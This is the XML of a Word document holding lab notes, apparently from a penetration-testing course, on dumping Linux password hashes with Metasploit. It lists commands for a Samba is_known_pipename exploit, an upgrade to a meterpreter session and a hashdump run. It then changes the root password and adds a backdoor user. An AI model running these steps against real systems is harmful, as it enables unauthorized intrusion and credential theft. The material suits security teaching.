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0284" w14:textId="3C4EE3CD" w:rsidR="00853ABF" w:rsidRPr="002A571B" w:rsidRDefault="007337EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A571B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Dumping Hashes </w:t>
      </w:r>
      <w:r w:rsidRPr="002A571B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r w:rsidRPr="002A571B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A571B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hashdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002A571B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232101D8" w14:textId="77777777" w:rsidR="007337EF" w:rsidRDefault="007337EF"/>
    <w:p w14:paraId="61EA2FF7" w14:textId="6B0E48AA" w:rsidR="007337EF" w:rsidRDefault="007337EF">
      <w:r>
        <w:t xml:space="preserve">Linux password hashes are stored in </w:t>
      </w:r>
      <w:r w:rsidR="002A571B">
        <w:t>the /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002A571B">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002A571B">
        <w:t>/shadow file. (only accessed by the root user)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F07A690" w14:textId="77777777" w:rsidR="002A571B" w:rsidRDefault="002A571B"/>
    <w:p w14:paraId="6F4EE4C2" w14:textId="7466B54D" w:rsidR="002A571B" w:rsidRPr="002A571B" w:rsidRDefault="002A571B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A571B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B37B32" w14:textId="77777777" w:rsidR="002A571B" w:rsidRDefault="002A571B"/>
    <w:p w14:paraId="2D328C68" w14:textId="4854BA77" w:rsidR="002A571B" w:rsidRDefault="002A571B">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="289C949E" w14:textId="2265BEAB" w:rsidR="002A571B" w:rsidRDefault="002A571B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0C58B3ED" w14:textId="54D5EA15" w:rsidR="002A571B" w:rsidRDefault="002A571B">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718A52BA" w14:textId="3451C7A3" w:rsidR="002A571B" w:rsidRDefault="002A571B">
      <w:r>
        <w:t xml:space="preserve">workspace -a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hashdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6C721E32" w14:textId="5DA0E63F" w:rsidR="002A571B" w:rsidRDefault="002A571B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29268052" w14:textId="09595768" w:rsidR="002A571B" w:rsidRDefault="002A571B">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>db_nmap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5BB6339B" w14:textId="5893783F" w:rsidR="002A571B" w:rsidRDefault="008D4A46">
      <w:r>
        <w:t xml:space="preserve">search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>type:exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> samba </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>platform:linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6DE4ED40" w14:textId="564AFCA3" w:rsidR="008D4A46" w:rsidRDefault="008D4A46">
      <w:r>
        <w:t>use(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>is_known_pipename</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F91E6E" w14:textId="2F49D7FB" w:rsidR="008D4A46" w:rsidRDefault="008D4A46">
      <w:r>
        <w:t>options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E1606F" w14:textId="6E312CEC" w:rsidR="008D4A46" w:rsidRDefault="008D4A46">
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCDFEC8" w14:textId="408BC041" w:rsidR="008D4A46" w:rsidRDefault="008D4A46">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>get</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> command shell session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65316617" w14:textId="77777777" w:rsidR="008D4A46" w:rsidRDefault="008D4A46"/>
    <w:p w14:paraId="633C2C5E" w14:textId="2AE2B050" w:rsidR="008D4A46" w:rsidRDefault="008D4A46">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="574910C4" w14:textId="7FFA3844" w:rsidR="008D4A46" w:rsidRDefault="008D4A46">
      <w:r>
        <w:t>Background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CA4168" w14:textId="77777777" w:rsidR="008D4A46" w:rsidRDefault="008D4A46"/>
    <w:p w14:paraId="5FE39C8C" w14:textId="54523A1B" w:rsidR="008D4A46" w:rsidRDefault="008D4A46">
      <w:r>
        <w:t>Sessions -u id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B45DBE2" w14:textId="40EC1604" w:rsidR="008D4A46" w:rsidRDefault="008D4A46">
      <w:r>
        <w:t xml:space="preserve"># upgrade session </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> as it is required in this case</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6B9320" w14:textId="77777777" w:rsidR="008D4A46" w:rsidRDefault="008D4A46"/>
    <w:p w14:paraId="083157DB" w14:textId="1C3D6580" w:rsidR="008D4A46" w:rsidRDefault="008D4A46">
      <w:r>
        <w:t>Sessions -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D0236D" w14:textId="15C1D4F1" w:rsidR="008D4A46" w:rsidRDefault="008D4A46">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AE3E2E" w14:textId="3B47985F" w:rsidR="008D4A46" w:rsidRDefault="008D4A46">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475327FD" w14:textId="756C8BC0" w:rsidR="008D4A46" w:rsidRDefault="008D4A46">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="511AD78F" w14:textId="728628C9" w:rsidR="008D4A46" w:rsidRDefault="008D4A46">
      <w:r>
        <w:t>Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D6A8FC" w14:textId="5022D0D9" w:rsidR="008D4A46" w:rsidRDefault="008D4A46">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="04E27F44" w14:textId="4E94F9E1" w:rsidR="008D4A46" w:rsidRDefault="008D4A46">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>terminate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> channel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B012632" w14:textId="77777777" w:rsidR="008D4A46" w:rsidRDefault="008D4A46"/>
    <w:p w14:paraId="03A0C380" w14:textId="2B345EC8" w:rsidR="008D4A46" w:rsidRDefault="008D4A46">
      <w:r>
        <w:t>Background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE5373E" w14:textId="0C90B50B" w:rsidR="008D4A46" w:rsidRDefault="008D4A46">
      <w:r>
        <w:t>Sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C7C0A4" w14:textId="667ABED6" w:rsidR="008D4A46" w:rsidRDefault="008D4A46">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hashdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="006DFF98" w14:textId="0FA23F1F" w:rsidR="008D4A46" w:rsidRDefault="008D4A46">
      <w:r>
        <w:t>Use(gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hashdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148086EB" w14:textId="2E9D22D6" w:rsidR="008D4A46" w:rsidRDefault="008D4A46">
      <w:r>
        <w:t>Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A592F2" w14:textId="6647DF21" w:rsidR="008D4A46" w:rsidRDefault="008D4A46">
      <w:r>
        <w:t xml:space="preserve">Set session id   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589935DA" w14:textId="4CE28ED2" w:rsidR="008D4A46" w:rsidRDefault="008D4A46">
      <w:r>
        <w:t xml:space="preserve"># that one </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="226ADC04" w14:textId="77777777" w:rsidR="008D4A46" w:rsidRDefault="008D4A46"/>
    <w:p w14:paraId="769174C7" w14:textId="3986E82D" w:rsidR="008D4A46" w:rsidRDefault="008D4A46">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D745E4A" w14:textId="208E54E4" w:rsidR="008D4A46" w:rsidRDefault="008D4A46">
      <w:r>
        <w:t xml:space="preserve"># it </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>store</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the file in the directory </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>contain</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> all the info </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAEDDD2" w14:textId="77777777" w:rsidR="008D4A46" w:rsidRDefault="008D4A46"/>
    <w:p w14:paraId="07E0B44A" w14:textId="2A936055" w:rsidR="008D4A46" w:rsidRDefault="008D4A46">
      <w:r>
        <w:t>Loot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF635D9" w14:textId="1ABCB2D1" w:rsidR="008D4A46" w:rsidRDefault="008D4A46">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>show</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the file and data </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>finded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0AF4E3BB" w14:textId="77777777" w:rsidR="008D4A46" w:rsidRDefault="008D4A46"/>
    <w:p w14:paraId="3AF72CAF" w14:textId="36BA79E3" w:rsidR="008D4A46" w:rsidRDefault="008D4A46">
      <w:r>
        <w:t>Sessions id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F306AE9" w14:textId="76DE2A1D" w:rsidR="008D4A46" w:rsidRDefault="008D4A46">
      <w:r>
        <w:t># shell sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338C8FAF" w14:textId="643F3D8D" w:rsidR="008D4A46" w:rsidRDefault="008D4A46">
      <w:r>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF31651" w14:textId="00989181" w:rsidR="008D4A46" w:rsidRDefault="008D4A46">
      <w:r>
        <w:t>/bin/bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="010B790D" w14:textId="77777777" w:rsidR="008D4A46" w:rsidRDefault="008D4A46"/>
    <w:p w14:paraId="230AFAA9" w14:textId="4115948E" w:rsidR="00106606" w:rsidRDefault="00106606"/>
    <w:p w14:paraId="2B1D1F53" w14:textId="2BCBFE13" w:rsidR="008D4A46" w:rsidRDefault="008D4A46">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Passwd root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD7924A" w14:textId="7FD46A61" w:rsidR="008D4A46" w:rsidRDefault="008D4A46">
      <w:r>
        <w:t># change the password of the root user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E449967" w14:textId="77777777" w:rsidR="008D4A46" w:rsidRDefault="008D4A46"/>
    <w:p w14:paraId="72A47760" w14:textId="5E757C9B" w:rsidR="0092134F" w:rsidRDefault="0092134F">
      <w:r>
        <w:t>#Add few users:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4137C0" w14:textId="77777777" w:rsidR="0092134F" w:rsidRDefault="0092134F">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Useradd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>alexis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -s /bin/bash </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71432580" w14:textId="002B7E22" w:rsidR="0092134F" w:rsidRDefault="0092134F">
      <w:r>
        <w:t xml:space="preserve"> # </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>provide</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the password </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>promot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5741690C" w14:textId="77777777" w:rsidR="0092134F" w:rsidRDefault="0092134F"/>
    <w:p w14:paraId="414425AE" w14:textId="20018A4C" w:rsidR="0092134F" w:rsidRDefault="0092134F">
      <w:r>
        <w:t>Background it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4348B086" w14:textId="77777777" w:rsidR="0092134F" w:rsidRDefault="0092134F"/>
    <w:p w14:paraId="2550FE4E" w14:textId="32331DE3" w:rsidR="0092134F" w:rsidRDefault="0092134F">
      <w:r>
        <w:t>Session -u 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359E9B0C" w14:textId="77777777" w:rsidR="0092134F" w:rsidRDefault="0092134F"/>
    <w:p w14:paraId="745A67AD" w14:textId="1AACDEB6" w:rsidR="0092134F" w:rsidRDefault="0092134F">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>run</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hashdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> again:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E66910C" w14:textId="77777777" w:rsidR="0092134F" w:rsidRDefault="0092134F" w:rsidP="0092134F">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hashdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0FD73E99" w14:textId="77777777" w:rsidR="0092134F" w:rsidRDefault="0092134F" w:rsidP="0092134F">
      <w:r>
        <w:t>Use(gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hashdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8920C3" w14:textId="77777777" w:rsidR="0092134F" w:rsidRDefault="0092134F" w:rsidP="0092134F">
      <w:r>
        <w:t>Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABAC6FC" w14:textId="77777777" w:rsidR="0092134F" w:rsidRDefault="0092134F" w:rsidP="0092134F">
      <w:r>
        <w:t xml:space="preserve">Set session id   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A708BD6" w14:textId="77777777" w:rsidR="0092134F" w:rsidRDefault="0092134F" w:rsidP="0092134F">
      <w:r>
        <w:t xml:space="preserve"># that one </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5AB165DC" w14:textId="77777777" w:rsidR="0092134F" w:rsidRDefault="0092134F" w:rsidP="0092134F"/>
    <w:p w14:paraId="629D8FF2" w14:textId="77777777" w:rsidR="0092134F" w:rsidRDefault="0092134F" w:rsidP="0092134F">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A82DC0" w14:textId="77777777" w:rsidR="0092134F" w:rsidRDefault="0092134F" w:rsidP="0092134F">
      <w:r>
        <w:t xml:space="preserve"># it </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>store</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the file in the directory </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>contain</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> all the info </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2ABA45" w14:textId="77777777" w:rsidR="0092134F" w:rsidRDefault="0092134F"/>
    <w:p w14:paraId="5F364E07" w14:textId="19D6F26B" w:rsidR="0092134F" w:rsidRDefault="002B16FC">
      <w:r>
        <w:t>Loot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54794729" w14:textId="661EAF7C" w:rsidR="002B16FC" w:rsidRDefault="002B16FC">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAA546B" w14:textId="73FBBABE" w:rsidR="002B16FC" w:rsidRDefault="002B16FC">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t># cat</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the file to see the password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64114F7F" w14:textId="77777777" w:rsidR="008D4A46" w:rsidRDefault="008D4A46"/>
    <w:p w14:paraId="26E87795" w14:textId="77777777" w:rsidR="00106606" w:rsidRDefault="00106606"/>
    <w:p w14:paraId="7C6FFCF8" w14:textId="77777777" w:rsidR="008D4A46" w:rsidRDefault="008D4A46"/>
    <w:p w14:paraId="54160CE4" w14:textId="49C0CB59" w:rsidR="008D4A46" w:rsidRPr="008D4A46" w:rsidRDefault="008D4A46">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D4A46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086B9F44" w14:textId="79440713" w:rsidR="008D4A46" w:rsidRPr="008D4A46" w:rsidRDefault="008D4A46" w:rsidP="008D4A46">
      <w:r w:rsidRPr="008D4A46">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="008D4A46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="008D4A46">
        <w:t xml:space="preserve"> → The account is locked; login with a password is </w:t>
      </w:r>
      <w:r w:rsidRPr="008D4A46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>not possible</w:t>
      </w:r>
      <w:r w:rsidRPr="008D4A46">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C9A5AF" w14:textId="7C9EF5AE" w:rsidR="008D4A46" w:rsidRPr="008D4A46" w:rsidRDefault="008D4A46" w:rsidP="008D4A46">
      <w:r w:rsidRPr="008D4A46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:r w:rsidRPr="008D4A46">
        <w:t xml:space="preserve"> → The password is </w:t>
      </w:r>
      <w:r w:rsidRPr="008D4A46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>disabled</w:t>
      </w:r>
      <w:r w:rsidRPr="008D4A46">
        <w:t>, so the user cannot log in using a password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E5E3F9" w14:textId="7C72B274" w:rsidR="008D4A46" w:rsidRPr="008D4A46" w:rsidRDefault="008D4A46" w:rsidP="008D4A46">
      <w:r w:rsidRPr="008D4A46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Empty field (nothing)</w:t>
      </w:r>
      <w:r w:rsidRPr="008D4A46">
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r w:rsidRPr="008D4A46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>No password is set</w:t>
      </w:r>
      <w:r w:rsidRPr="008D4A46">
        <w:t xml:space="preserve"> — the account can be accessed without a</w:t>
      </w:r>
      <w:r w:rsidR="00106606">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D4A46">
        <w:t>password (very insecure).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF9E08C" w14:textId="7FC8EC7A" w:rsidR="008D4A46" w:rsidRDefault="00BF18CD" w:rsidP="008D4A46">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BF18CD">
        <w:t>yes</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BF18CD">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF18CD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>usually</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF18CD">
        <w:t xml:space="preserve"> (but not always) those accounts with a * </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BF18CD">
        <w:t>or !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BF18CD">
        <w:t xml:space="preserve"> in /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BF18CD">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BF18CD">
        <w:t xml:space="preserve">/shadow are </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF18CD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>system or service accounts</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF18CD">
        <w:t>, not normal login users.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="008D4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9E"/>
    <w:rsid w:val="00106606"/>
    <w:rsid w:val="002A571B"/>
    <w:rsid w:val="002B16FC"/>
    <w:rsid w:val="00537D13"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="007337EF"/>
    <w:rsid w:val="00804D9E"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="008D4A46"/>
    <w:rsid w:val="0092134F"/>
    <w:rsid w:val="00A21259"/>
    <w:rsid w:val="00BF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4359"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{64E0CC29-C3BA-43A2-AFBC-B036B1E61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14</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-17T09:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-17T09:33:00Z</dcterms:modified>
</cp:coreProperties>
</file>